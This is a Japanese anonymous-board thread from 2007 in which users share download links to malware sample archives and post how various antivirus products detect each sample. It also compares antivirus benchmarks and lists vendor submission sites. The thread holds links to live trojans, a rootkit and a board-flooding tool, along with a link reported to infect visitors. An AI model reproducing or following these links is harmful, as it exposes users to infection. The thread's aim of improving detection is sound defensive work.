>>239
キラー未検出


241 :名無しさん@お腹いっぱい。:2007/07/07(土) 14:09:37
>>239
カスペ6
Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/a/3.exe
Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/a/4.exe
Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/a/5.exe
Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/a/6.exe

ttp://zawameki.or.tp/up/download/1183784540906404.xgIiEo?dl

242 :241:2007/07/07(土) 14:12:01
ミスった
ttp://zawameki.or.tp/up/download/1183784540906404.xgIiEo

243 :名無しさん@お腹いっぱい。:2007/07/07(土) 14:12:12
>>239
言うまでもないがNODは全部未検出

244 :241:2007/07/07(土) 14:24:02
またもやミスったorz
2.exe は、午前中、別件で検体送った。

>>239
カスペ6
Backdoor.Win32.FTP.Delf.a ファイル: C:\Temp\a.zip/a/2.exe
Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/a/3.exe
Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/a/4.exe
Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/a/5.exe
Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/a/6.exe

1.exe は検体提出

245 :名無しさん@お腹いっぱい。:2007/07/07(土) 15:18:43
>>244
GJ

246 :名無しさん@お腹いっぱい。:2007/07/07(土) 15:29:37
>>239
McAfee空振り
さーて提出提出

247 :名無しさん@お腹いっぱい。:2007/07/07(土) 16:58:08
>>239
AVGスルー
送った

248 :名無しさん@お腹いっぱい。:2007/07/07(土) 21:45:02
>>239
Avira Antivir
--> a/3.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.6
--> a/4.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.5
--> a/6.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.7

3.4.6 検出 1.2.5 未検出
送りました

249 :名無しさん@お腹いっぱい。:2007/07/07(土) 23:27:17
>>244


250 :名無しさん@お腹いっぱい。:2007/07/07(土) 23:32:58
Rubyってスクリプト言語のRubyのことかな?

251 :名無しさん@お腹いっぱい。:2007/07/08(日) 01:57:45
>>239
Norton 未検出
提出しました

252 :240:2007/07/08(日) 02:14:04
Risingサーバー重くて何度やっても提出失敗
誰か頼みます

253 :名無しさん@お腹いっぱい。:2007/07/08(日) 03:30:59
カスペ7

>>241-242さんのおかげで、スキャンしたら、未検知分については、シグネチャに追加されていたみたいだな。カスペ7

detected: Trojan program Trojan.Win32.KillFiles.mr File: C:\Users\***\Desktop\tane_uljp00065.rar/a.zip/a/1.exe

254 :名無しさん@お腹いっぱい。:2007/07/08(日) 07:13:14
>>239
ウイルスバスター2007
3.exe TROJ_RUBY.N
4.exe TROJ_Generic
5.exe TROJ_AGENT.LIP
6.exe TROJ_RUBY.P

1.exeと2.exeは提出

255 :名無しさん@お腹いっぱい。:2007/07/08(日) 08:52:13
>>239
Avira Antivir

1.2.5 も対応されました

--> a/1.exe
[DETECTION] Is the Trojan horse TR/KillFiles.MR
--> a/2.exe
[DETECTION] Contains a signature of the (dangerous) backdoor program BDS/FTP.Delf.A Backdoor server programs
--> a/3.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.6
--> a/4.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.5
--> a/5.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.9
--> a/6.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.7

256 :名無しさん@お腹いっぱい。:2007/07/08(日) 15:58:59
カスペやAntiVirはフットワーク軽くてええのう

257 :名無しさん@お腹いっぱい。:2007/07/09(月) 21:40:06
トレンドマイクロがウイルスハンター9人を表彰、新種2,431件発見( Internet Watch, 2007/7/6)

 トレンドマイクロは6日、ウイルスの検体を一般から募集する「ウイルスハンタープロジェクト」の表彰式を開催した。
受賞者は9人で、2,431件の新種ウイルスを発見した。

 今回のウイルスハンタープロジェクトは、2006年6月1日から2007年5月末日まで実施し、検体を数多く提供した個人を表彰した。
受賞者は9人で、2,431件の新種ウイルスを発見。2006年の15人(団体含む)、467件から大幅に増加した。

 表彰式には、受賞対象者のうち男性2人が参加した。1人は、オンラインゲームのアカウントクラッキングに絞って収集しており、140件の新種を発見。
「これだけの数を収集していたことに自分でも驚いた」と述べた。もう1人は、ハニーポットを使って友人と一緒に収集し、101件の新種を発見。この日は、
新たに収集した検体も持参していた。

 トレンドマイクロによると、ウイルスハンターに応募するユーザーは、年齢や職業もさまざま。検体収集に費やす時間も1日数十分から1時間程度と
ユーザーによって異なる。今回の受賞者の中には、1人で1,000件以上の新種を発見したユーザーもいるという。受賞条件としては、検体を数多く提
供したこと以外にも、トレンドマイクロが入手したかった重要な検体を提供したことなどが加味される。

 岡本氏は、「日本でもリージョナルトレンドラボができたことで、サンプルの収集はユーザーよりも早くなっているが、すべてを発見することは不可能
。ウイルスハンターの協力は大きい」とした。また、ウイルスハンターへのアドバイスとして、「ミイラ取りがミイラにならないよう、まず自分の安全を第一
に考えてほしい」と述べた。このほか岡本氏は、検体の提供からパターンファイルを作るまでの工程を解説した。

「今回は2,431件もパターンファイルに反映できた。本当にありがとうございました。今後も3年、4年と連続して協力していただきたい」とした。

ttp://internet.watch.impress.co.jp/cda/news/2007/07/09/16279.html



おいらも、一流のウイルスハンターになるため、日々がんばるお( ^ω^)

258 :名無しさん@お腹いっぱい。:2007/07/09(月) 22:17:03
>>257
それ、去年は山田チェッカー作った高校生が貰ってるはず
ttp://blog.livedoor.jp/antiny_virus/archives/50538679.html

259 :名無しさん@お腹いっぱい。:2007/07/09(月) 22:32:12
(´・ω・) ス

260 :名無しさん@お腹いっぱい。:2007/07/09(月) 23:38:14
> 1人で1,000件以上の新種を発見したユーザーもいるという。

ちょwww、こいつ、ウイルス作者だろ。

261 :名無しさん@お腹いっぱい。:2007/07/09(月) 23:46:04
>>257
おれらの金儲けのためにがんばってくれてありがとうってことでしょ。

262 :名無しさん@お腹いっぱい。:2007/07/10(火) 01:01:49
■日本のセキュリティ情報 Security Infomation Directory - ウイルス
ttp://sid.softek.co.jp/virus/result.html?span_type=begin_now&span_week=0

263 :名無しさん@お腹いっぱい。:2007/07/10(火) 19:47:45
一番上のRootkit:W32/Agent.EAって例のフルカーネルマルウェアだな
f-secureは対応したというわけか

264 :263:2007/07/10(火) 20:35:04
http://www5.uploader.jp/dl/tane/tane_uljp00065.zip.html
pass Srizbi
上記のフルカーネルrootkit 未対応AVユーザーは通報ヨロ

265 :名無しさん@お腹いっぱい。:2007/07/10(火) 20:45:36
>>264
McAfee未対応につき提出完了

266 :名無しさん@お腹いっぱい。:2007/07/10(火) 21:02:30
【検体サンプル】>>264
【ソフト名】ウイルスキラー
【結果】Trojan.Win32.Agent.igj
【SS】http://www5.uploader.jp/user/tane/images/tane_uljp00066.png

267 :名無しさん@お腹いっぱい。:2007/07/10(火) 21:06:27
>>266
なんだそのトンチャもん

268 :名無しさん@お腹いっぱい。:2007/07/10(火) 21:09:52
>>264
Symantec 10 07.10.2007 Trojan.Srizbi

269 :名無しさん@お腹いっぱい。:2007/07/10(火) 21:14:46
【検体サンプル】>>264
【ソフト名】カスペルスキー7
【結果】http://www5.uploader.jp/dl/tane/tane_uljp00067.png.html
detected: Trojan program Rootkit.Win32.Agent.ea File: C:\***\tane_uljp00065.zip/m.exe//PE_Patch.UPX//UP



270 :名無しさん@お腹いっぱい。:2007/07/10(火) 21:15:05
>>264
AVG
Trojan horse SHeur.TC検出

271 :名無しさん@お腹いっぱい。:2007/07/10(火) 21:20:17
なんだみんな検出するんだな
俺のNODはちっぱりさっぱり反応せんのに

272 :名無しさん@お腹いっぱい。:2007/07/10(火) 21:22:02
>>264
AviraAntivirFree検出

273 :名無しさん@お腹いっぱい。:2007/07/10(火) 21:26:20
>>264

Avira AntiVir

TR/Crypt.XDR.Gen - Trojan

274 :名無しさん@お腹いっぱい。:2007/07/10(火) 22:26:28
>>264
バスター2007
検出せず、提出済み

275 :名無しさん@お腹いっぱい。:2007/07/10(火) 22:45:27
>>271
ESETは例によってサボってんのかw

276 :名無しさん@お腹いっぱい。:2007/07/10(火) 22:46:36
バスター2007

ワロス


277 :名無しさん@お腹いっぱい。:2007/07/10(火) 23:35:12
BitDefender CL 無反応

Aviraは無差別でウィルス扱いする代物だからな。

278 :名無しさん@お腹いっぱい。:2007/07/10(火) 23:39:32
>>277
Bitの誤検出には敵わないと思うが

279 :名無しさん@お腹いっぱい。:2007/07/10(火) 23:42:31
ま、要は誤検出の程度問題だが、今の時代検出しないよりはぜんぜんましよ


280 :名無しさん@お腹いっぱい。:2007/07/10(火) 23:44:13
>>275
Eset社の戦略としてシグネチャは出来るだけ少なく最小の発行数に留める方針。
これは近年亜種の急増により発行シグネチャが爆発的に増加している状況への対応策。
このままだと何れ発行シグネチャが増え過ぎで立ち行かぬとの判断が優先された結果であり、
亜種は発行済みシグネチャとアンパッカー技術により検出する方向で改良を続けており、
そこに拡張ヒューリスティックエンジンを組み合わせることで類似ウィルスまで捕捉しようとの試みを含んでいる。

281 :名無しさん@お腹いっぱい。:2007/07/10(火) 23:46:47
>>280
で? 結果、検出できなきゃ意味ないよw

282 :名無しさん@お腹いっぱい。:2007/07/10(火) 23:47:28
>>281
NOD32はプロファイルに検査方法や検査対象を登録しておき、
そのプロファイルを指定してスケジュールを組むことが出来る。
プロファイルも自由に複数作成出来るから目的に応じた運用が可能だ。
例えば、書庫類等は検査済みフォルダと検査前フォルダを作成しておき、
検査前フォルダ内の書庫だけを定期的に高速検査するというような運用も行える。
他のAVだと書庫を対象とするか否かの2択しかないものが多く、ムダに時間が掛かる検査となり効率が悪い。
一度検査し安全が確かめられれば検査済みフォルダに移し、
検査済みフォルダの再検査は数か月に一度程度に減らすことで処理効率を上げるというような運用が他のAVでは難しい。
細かな設定をすることでNOD32は処理効率の良い運用が可能になっている。

283 :名無しさん@お腹いっぱい。:2007/07/11(水) 00:21:48
>NOD32は処理効率の良い運用が可能になっている。

はいはい で? 結果、検出できなきゃ意味ないよw

284 :名無しさん@お腹いっぱい。:2007/07/11(水) 00:26:50
ウイルスキラーはショートカット機能でスキャン対象とレベル設定できます
Smart Speedup機能でスキャン速度速くなります

>>282
>他のAVでは難しい。

え?

285 :名無しさん@お腹いっぱい。:2007/07/11(水) 06:39:51
魔法のiらんどに埋め込まれてたトロイって何だろ?

286 :名無しさん@お腹いっぱい。:2007/07/11(水) 11:20:53
★AV-Comparatives_Reprospective/Proactive_Test_(プロアクティブ)2007/5

●Advanced+(大変よくできました・3つ星)
ESET_NOD32______________68%__FP:ごくわずか(1)__スキャン速度:速い(7.33)
------------------------------------------------------------
●Advanced(よくできました・2つ星)
Kaspersky_Anti-Virus7.0_35%__FP:ごくわずか(1)__(未発売)
F-Secure_AntiVirus_______31%__FP:ごくわずか(1)__スキャン速度:遅い(1.48)_
GDATA_AntiVirusKit______31%__FP:多い(14)_________スキャン速度:遅い(1.86)_
Avast!_Professional_______28%__FP:少ない(4)________スキャン速度:ふつう(3.55)
Norman__VirusControl____28%__FP:少ない(8)________スキャン速度:ふつう(6.45)
Symantec_Norton_AV_____24%__FP:ゼロ(0)___________スキャン速度:速い(6.45)
McAfee_ScanVirus________24%__FP:少ない(3)________スキャン速度:速い(6.32)
----------------------------------------------------------
●STANDARD(ふつう・1つ星)
Avira_AntiVir_PE_Premium_71%_FP:多い(18)______スキャン速度:速い(7.49)
TrustPort_AV_WS__________58%_FP:多い(22)________スキャン速度:遅い(1.21)
BitDefenmder_Prof+_______48%_FP:多い(12)_______スキャン速度:遅い(1.96)
F-Prot_________________________31% FP: 多い(26)______スキャン速度:ふつう(4.18)
Dr.Web________________________30%_FP:多い(36)_______スキャン速度:遅い(1.91)
Microsoft_Live_OneCare___18%_FP:ごくわずか(1)__スキャン速度:速い(6.11)
Kaspersky_Anti-Virus6.0___9%_FP:ごくわずか(1)__スキャン速度:ふつう3.51)
eScan_AntiVirus_____________9%_FP:ごくわずか(1)__スキャン速度:ふつう(3.21)
AVG_Anti-Malware__________9%_FP:多い(14)________スキャン速度:遅い(2.25)
-----------------------------------------------------------
●無印(ランク外・星なし)
Fortinet_FortiClient__________71%_FP:非常に多い(1000+)スキャン速度:速い(6.77)


287 :名無しさん@お腹いっぱい。:2007/07/11(水) 11:56:58
でもNODはまだ未検出です><
スキャンするとCPUが100%になって
それから「検出されたウイルス数:0」って出ます><
勘弁してください><

288 :名無しさん@お腹いっぱい。:2007/07/11(水) 12:14:06
http://www.virustotal.com/vt/en/resultadof?b8f4a436c70a335678bc38dfe4317ede
http://vista.crap.jp/img/vi8412356827.jpg

こんなとこか
毎度NODのテスト結果は現実に即していないから困る

289 :名無しさん@お腹いっぱい。:2007/07/11(水) 14:46:23
テンプレに追加希望

サンプル提出先:
Microsoft
ttp://www.microsoft.com/security/portal/submit.aspx

290 :名無しさん@お腹いっぱい。:2007/07/11(水) 15:35:07
>>289
却下

291 :名無しさん@お腹いっぱい。:2007/07/11(水) 17:53:17
>>289
OKだが、今言っても亀スレなのでみんな忘れてる。

292 :名無しさん@お腹いっぱい。:2007/07/11(水) 18:28:03
VirusTotalが衣替えしててビビった
とりあえず手持ちのウイルスを突っ込んでみる
http://vista.jeez.jp/img/vi8414602501.jpg

293 :名無しさん@お腹いっぱい。:2007/07/11(水) 18:52:49
あれ?
F-Secureはぬけたのかな?

294 :名無しさん@お腹いっぱい。:2007/07/11(水) 19:22:57
27社になってる

295 :名無しさん@お腹いっぱい。:2007/07/11(水) 21:59:38
トレンドマイクロはまた入ってないのかorz

296 :名無しさん@お腹いっぱい。:2007/07/11(水) 22:19:14
皆さんのおかげで助かります
感謝ですm(__)m

297 :名無しさん@お腹いっぱい。:2007/07/11(水) 23:13:20
どちら様でしょうかw

298 :名無しさん@お腹いっぱい。:2007/07/12(木) 17:51:53
>>295
ttp://scanner.virus.org/ で我慢。
ここは検知するはずの検体も検知なしになったりするので
検知した、という結果は信用できるけど
検知しなかった、という結果は信用できない。
おまけにカスペも無いのでVirusTotalやJottiと併用することになる。

299 :名無しさん@お腹いっぱい。:2007/07/12(木) 22:27:40
ttp://www5.uploader.jp/dl/tane/tane_uljp00070.rar.html
antilo

300 :名無しさん@お腹いっぱい。:2007/07/12(木) 22:46:52
>>299
Norton Internet Security 2007
Trojan.Kakkeys.D ×6検知

301 :名無しさん@お腹いっぱい。:2007/07/12(木) 22:47:03
>>299
Risingに送ってきます

302 :名無しさん@お腹いっぱい。:2007/07/12(木) 23:36:17
>>299
Kaspersky 6

削除しました: トロイ Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/AntiDojin/1/doujinunko.exe
削除しました: トロイ Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/AntiDojin/2/doujinunko2.exe
削除しました: トロイ Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/AntiDojin/3/doujinunko2.exe
削除しました: トロイ Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/AntiDojin/4/doujinunko3.exe
削除しました: トロイ Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/AntiDojin/5/doujinunko9.exe
削除しました: トロイ Trojan-Spy.Ruby.Kakkeys.n ファイル: C:\Temp\a.zip/AntiDojin/6/doujinunk9.exe

残り、検体送りますた。

303 :名無しさん@お腹いっぱい。:2007/07/13(金) 00:13:46
>>302
GJ

304 :名無しさん@お腹いっぱい。:2007/07/13(金) 01:05:17
>>299
Avira Antivir

--> AntiDojin/1/doujinunko.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.6
--> AntiDojin/2/doujinunko2.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.5
--> AntiDojin/3/doujinunko2.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.9
--> AntiDojin/4/doujinunko3.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.7
--> AntiDojin/5/doujinunko9.exe
[DETECTION] Is the Trojan horse TR/Spy.Ruby.Kakkeys.N.11
--> AntiLo/1/[?c?・?e] Lolita Complex 8.exe
[DETECTION] Is the Trojan horse TR/AvKill.929792.1
--> AntiLo/2/(? ̄?l??) [???1?U] ?-?I???{ 2.exe
[DETECTION] Is the Trojan horse TR/AvKill.931840

残りは送った。

やべー、AntiDojinのdoujinunk9踏んじった。しきりに外部へアクセスしてるorz
セーフモードで駆除してこよう

305 :名無しさん@お腹いっぱい。:2007/07/13(金) 01:17:18
【検体サンプル】>>299
【ソフト名】カスペルスキー7
【結果】9/9
【SS】http://www5.uploader.jp/user/tane/images/tane_uljp00072.png

>>302に加えて。残りの3つについてももヒューリスティックで検知。
Invaderで、他のプロセスに侵入しようとしている

detected: virus Invader (modification) File: \tane_uljp00070.rar/a.zip/AntiLo/1/[らする] Lolita Complex 8.exe
detected: virus Invader (modification) File: \tane_uljp00070.rar/a.zip/AntiLo/2/(同人誌) [直道館] くぱぁ本 2.exe
detected: virus Invader (modification) File: \tane_uljp00070.rar/a.zip/AntiLo/3/(同人誌) [Chemi-Story] ChaL Mate Second Term.exe

>>302


306 :名無しさん@お腹いっぱい。:2007/07/13(金) 04:59:17
>>299
ウイルスバスター2007
AntiDojin\1\doujinunko.exe TROJ_RUBY.N
AntiDojin\3\doujinunko2.exe TROJ_AGENT.LIP
AntiDojin\2\doujinunko2.exe TROJ_Generic
AntiDojin\4\doujinunko3.exe TROJ_RUBY.P
残り検体提出しました

307 :名無しさん@お腹いっぱい。:2007/07/13(金) 09:18:24
>>299
McAfeeオールスルー
手間かけさせやがってヽ(`Д´)ノ

308 :名無しさん@お腹いっぱい。:2007/07/13(金) 14:20:03
>>307
出来の悪い子の方が愛情注ぎたくなるだろ
めいっぱい世話してやれw

309 :名無しさん@お腹いっぱい。:2007/07/13(金) 14:54:10
>>299
NOD32 7つ、残りの検体は放置(送ってもムダ)
X:\ウイルス\tane_uljp00070\a.zip ≫ZIP ≫AntiDojin/1/antidojin.rb - Ruby/TrojanSpy.Kakkeys.K トロイ
X:\ウイルス\tane_uljp00070\a.zip ≫ZIP ≫AntiDojin/2/antidojin.rb - Ruby/TrojanSpy.Kakkeys.K トロイ
X:\ウイルス\tane_uljp00070\a.zip ≫ZIP ≫AntiDojin/3/antidojin.rb - Ruby/TrojanSpy.Kakkeys.K トロイ
X:\ウイルス\tane_uljp00070\a.zip ≫ZIP ≫AntiDojin/4/antidojin.rb - Ruby/TrojanSpy.Kakkeys.K トロイ
X:\ウイルス\tane_uljp00070\a.zip ≫ZIP ≫AntiDojin/5/antidojin.rb - Ruby/TrojanSpy.Kakkeys.K トロイ
X:\ウイルス\tane_uljp00070\a.zip ≫ZIP ≫AntiDojin/5/doujinunko9.exe - Win32/Kakkeys.NAH トロイ
D:\ウイルス\tane_uljp00070\a.zip ≫ZIP ≫AntiDojin/6/antidojin.rb - Ruby/TrojanSpy.Kakkeys.K トロイ


310 :名無しさん@お腹いっぱい。:2007/07/13(金) 15:19:04
新種の検体提出したら、ポイント制にしてほしいね。
ライセンスの更新料の値引きとか。
製品の向上につながるが、結構送るの面倒くさいし、
それなりのリスクもあるし、モチベーションが。

キングみたいにUSBメモリはいらないが。w

以上チラ裏。

311 :名無しさん@お腹いっぱい。:2007/07/13(金) 15:50:47
善意だからいいんだよ、こういうのは

312 :名無しさん@お腹いっぱい。:2007/07/13(金) 16:09:49
>>299
キラー
D:\virus\tane_uljp00070\AntiDojin\5\doujinunko9.exe Trojan.Spy.Win32.Agent.dcx

でかいウイルス送付できないから痛い

313 :名無しさん@お腹いっぱい。:2007/07/13(金) 16:18:57
>>308
そうはいうがな、McAfeeは検体受付に関しちゃ最悪だぞ?
送ってもろくに返事はよこさないわ、返事きても「そのうち対応する(意訳)」だけだわ…
優先順位っつーのがあるのは理解できるが、
せめて対応するつもりがあるかどうかくらいは返事してくれよ

大体今回のだってな、一部は>>239のとMD5一緒なんだよ
前回の検体に対応してれば今回全滅なんてことには……


でも送るんだけどな

314 :名無しさん@お腹いっぱい。:2007/07/13(金) 16:33:33
即時対応する必要性が非常に低い、と判断されてるってことだろ
極東の一部のウイルスなんか

315 :名無しさん@お腹いっぱい。:2007/07/13(金) 16:38:27
>>310
自分でウィルスが作れる奴が稼げるようになるだけだろ。

316 :名無しさん@お腹いっぱい。:2007/07/13(金) 18:28:25
>>313
McAfeeは
ttps://www.webimmune.net/
が前からあるからいいじゃないか。

これに比べてNortonはsarcret.exeという自前のメーラを拾って送れだった。
今はプロバイダのOP25B等でまず使えないので他OS向けのこっちからアップ。
ttps://submit.symantec.com/retail/

トレンドマイクロなんか郵送しろだぞ。
こっちから送れるけど、俺のFirefoxではなぜかアップできん(IEは可)。
ttp://subwiz.trendmicro.com/

以上、全て非ユーザでも可能な方法ね。

317 :名無しさん@お腹いっぱい。:2007/07/13(金) 18:55:41
>>313
それは辛いな
おまえも早くカスペにすれば?
育て甲斐のあるやつだぞw

318 :名無しさん@お腹いっぱい。:2007/07/13(金) 19:48:12
>>317
あのおっさんは即対応してくれるからな、返事もちゃんと来るし
そういう意味では送り甲斐はあるなw

319 :名無しさん@お腹いっぱい。:2007/07/14(土) 04:23:10
しかも名前覚えてやりとりするのが楽しいw

320 :名無しさん@お腹いっぱい。:2007/07/14(土) 23:05:16
Pandaって
なんであんなに誤検出が多いんだろう

321 :名無しさん@お腹いっぱい。:2007/07/14(土) 23:10:27
白黒はっきりして欲しいね。

322 :名無しさん@お腹いっぱい。:2007/07/15(日) 01:39:10
実はレッサー・・

323 :名無しさん@お腹いっぱい。:2007/07/15(日) 20:38:26
解凍後、未対応の為即感染・・・を防ぐのに
一番いいやり方は
・ダウンロードパスは付けた方がいい
・一回目の外フォルダに解凍パス(中身の内フォルダには解凍パス無しの圧縮フォルダ・・・パス無しフォルダ記号を付けるとか)

少々面倒ですがこれしかないと思う

324 :名無しさん@お腹いっぱい。:2007/07/15(日) 21:10:42
>>323
ttp://takagi-hiromitsu.jp/diary/20060302.html
これの制限つきゾーンでやるとexeなどは実行できなくなる

325 :323:2007/07/15(日) 21:17:38
>>324
http://pc11.2ch.net/test/read.cgi/sec/1181836779/74

exeは問題無い


326 :名無しさん@お腹いっぱい。:2007/07/15(日) 21:28:18
解凍ソフトはWinRARと7-Zipあたりでいいのか?

327 :名無しさん@お腹いっぱい。:2007/07/15(日) 21:49:50
なんだDLLリスクって
そんな単語ねえぞ

328 :名無しさん@お腹いっぱい。:2007/07/17(火) 10:39:25
http://virus.com/hard-crash/kintama.exe

329 :名無しさん@お腹いっぱい。:2007/07/17(火) 13:45:02
>>323
Linuxで作業すればいいんじゃね?

330 :名無しさん@お腹いっぱい。:2007/07/19(木) 20:20:32
Mpack
http://www.virustotal.com/resultado.html?a96396c0e29cd720159e280780bb1820

331 :名無しさん@お腹いっぱい。:2007/07/19(木) 20:41:08
NOD32v2   2406   2007.07.19   no virus found

332 :名無しさん@お腹いっぱい。:2007/07/20(金) 22:50:39
AV-Test.org Reports Stats from Antivirus Roundup 検知力テスト結果 (2007年05月22日)
ttp://www.pcmag.com/article2/0,1895,2135053,00.asp

01位)WebWasher  99.83% (605,846)
02位)AVK 2007   99.56% (604,255)
03位)AntiVir     99.42% (603,408)
04位)F-Secure.   97.93% (594,333)
05位)Symantec   97.77% (593,355)
06位)Kaspersky   97.64% (592,606)
07位)Fortinet.    97.06% (589,028)
08位)Avast!.     96.32% (584,574)
09位)AVG.      96.15% (583,541)
10位)Rising      96.02% (582,772)
11位)BitDefender  95.68% (580,700)
12位)Norman..    94.66% (574,476)
13位)Ikarus..     92.54% (561,607)
14位)Panda.     92.09% (558,899)
15位)Trend Micro 90.97% (552,107)
16位)Nod32.     88.32% (536,043)
17位)McAfee     87.28% (529,680)

333 :名無しさん@お腹いっぱい。:2007/07/20(金) 22:57:36
カスペ AVAST AVGの差が殆ど無くなってる件

334 :名無しさん@お腹いっぱい。:2007/07/20(金) 23:06:25
無差別に近い試験だからシグネチャを大量に発行さえしていれば上位になるからなw

335 :名無しさん@お腹いっぱい。:2007/07/20(金) 23:10:01
低いよりは断然いい

336 :名無しさん@お腹いっぱい。:2007/07/20(金) 23:15:14
そんなことはねぇよ。
遭遇率の高いウィルスを逃していたら幾ら上位でも安心できねぇ。

337 :名無しさん@お腹いっぱい。:2007/07/20(金) 23:23:12
Badbunny
http://www.virustotal.com/resultado.html?6ae2bee9bafa8490c9ff11a6b947b7c0

338 :名無しさん@お腹いっぱい。:2007/07/20(金) 23:29:26
それ感染すると具体的にどんな影響が出るウィルスなんだ?

339 :名無しさん@お腹いっぱい。:2007/07/20(金) 23:39:39
感染プラットフォームが問題
http://japan.cnet.com/news/sec/story/0,2000056024,20350533,00.htm

340 :名無しさん@お腹いっぱい。:2007/07/20(金) 23:50:25
名前は確かにBadbunnyだけれど解説をしているシマンテック社のAVでは検知していないから実際にどんなウィルスなのか分らないな

341 :名無しさん@お腹いっぱい。:2007/07/20(金) 23:54:47
http://www.trendmicro.com/vinfo/images/XML_BADBUN_A_img3.gif

342 :名無しさん@お腹いっぱい。:2007/07/21(土) 00:45:11
>>332
マカフィー<AVG、Avast っていうのがどうも引っかかる
意図的なものを感じざるを得ない

343 :名無しさん@お腹いっぱい。:2007/07/21(土) 01:08:13
>>342
ここ最近振るわないのはムダなシグネチャの発行を抑えてるからじゃないかな?
少し古いデータだけど2006/12のVirus Bulletin誌の比較試験(WinXP x64)だとそんなに悪くない。

2006/12のVirus Bulletin誌 On Access試験
ttp://www5.uploader.jp/dl/tane/tane_uljp00076.jpg.html

検体種:Polymorphic ミス件数
1).  46件 マカフィー
2) 128件 Antivir
3) 249件 AVG
4) 384件 Avast

生きた検体での比較試験だとこんな感じになる 

344 :名無しさん@お腹いっぱい。:2007/07/25(水) 06:43:04
ttp://www5.uploader.jp/dl/tane/tane_uljp00077.rar.html
virus

345 :名無しさん@お腹いっぱい。:2007/07/25(水) 07:41:41
>>344
Avira AntiVir

未反応、検体送った

346 :名無しさん@お腹いっぱい。:2007/07/25(水) 08:14:01
>>344
Norton Internet Security 2007
File数2
未検知なので贈っとくよ

347 :名無しさん@お腹いっぱい。:2007/07/25(水) 08:49:17
>>344
Risingに送ってきた

348 :名無しさん@お腹いっぱい。:2007/07/25(水) 09:03:31
>>344
McAfee今回もだめぽ

349 :名無しさん@お腹いっぱい。:2007/07/25(水) 11:16:18
>>344
つーかこれ何? UPXバラして見たけど、2ch系のBBSへ爆撃する物?

350 :名無しさん@お腹いっぱい。:2007/07/25(水) 11:35:14
爆撃用だな。それっぽい文字列ばっか。

http://www.2ch.net/
subject.txt
POST
Content-Type: application/x-www-form-urlencoded
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: ja
%8F%91%82%AB%8D%9E%82%DE
subject=%s&FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&time=%d&key=%s&submit=%s
ERROR!
■ 書き込み確認 ■
mogera hana

%8F%91%82%AB%8D%9E%82%DE はデコードすると「書き込む」。
パターンファイルの作り方によっては2ch専ブラも引っかかっちまうかもね。

351 :名無しさん@お腹いっぱい。:2007/07/25(水) 13:18:56
>>344
ウイルスバスター2007
未検出、提出済み

virustotalかけてるけど、現時点でeSafeがsuspicious Trojan/Worm、
PandaがSuspicious fileと出るだけ。

352 :名無しさん@お腹いっぱい。:2007/07/25(水) 13:34:45
>>344
VirusTotalスルーしたKasperskyとAVGに投げておいた
ってかこれ角煮爆撃?

353 :名無しさん@お腹いっぱい。:2007/07/25(水) 13:43:09
次から揚げる人は適当なトリップ付けるべきだよ
これじゃ釣堀w

354 :名無しさん@お腹いっぱい。:2007/07/25(水) 13:45:30
お、スマンコ、忘れてた、俺としたことがorz
AntiVirの癖におかしいとオモタ・・・

355 :名無しさん@お腹いっぱい。:2007/07/25(水) 14:07:21
ROMるとするか

356 :名無しさん@お腹いっぱい。:2007/07/25(水) 18:07:57
>>344と思われる物のRisingからのメール
   1.文件名:(??????) [KEN] ???側彫妛?.exe
   不是病毒

357 :名無しさん@お腹いっぱい。:2007/07/25(水) 19:04:08
雑音までもが、名無しでサンプルをうpするようになっているからなぁ・・。

358 :名無しさん@お腹いっぱい。:2007/07/25(水) 22:33:18
>>344
FIS2007 不検出 
検体提出した。
いつも返事メールこないからしばらく参戦しなかったけど
スレも落ち着いてきたので復活

359 :名無しさん@お腹いっぱい。:2007/07/26(木) 02:06:20
今回はカスペルスキー組のレスがないな・・・

360 :名無しさん@お腹いっぱい。:2007/07/26(木) 02:35:09
Kasperskyはトロイを一体検出、他はダメ

361 :名無しさん@お腹いっぱい。:2007/07/26(木) 02:36:20
【宏観】そういえば?不思議な現像【場所必須】106
http://live24.2ch.net/test/read.cgi/eq/1185203357/l50

359 名前:M7.74(樺太) 投稿日:2007/07/25(水) 11:47:00.07 DD0wQ74W
噴煙?
http://zero.bestmanage3.org/framecj.php?aff_id=5024#movies/part2.mpg

お力、お知恵をお貸しください
↑の場所をゾヌからIEで表示したらノートン先生から警告受けましたが
その後ノートン先生から削除できないと言われ後に
先生のオートプロテクトがオフ表示にされ 電子メールスキャンもエラー表示
常駐からも落とされ 復旧を押しても無反応・・・ 先生が完全死亡です。
今現在モデムは、何かを送信続けてランプは点灯しっぱなしでモデム状況を見ても
間違いなく受信数をはるかに超えた送信数になっています。
スキャンをかけると rdlbjygr.exe rsyncini.exe twain_32.exeの3個が今だ居残り中
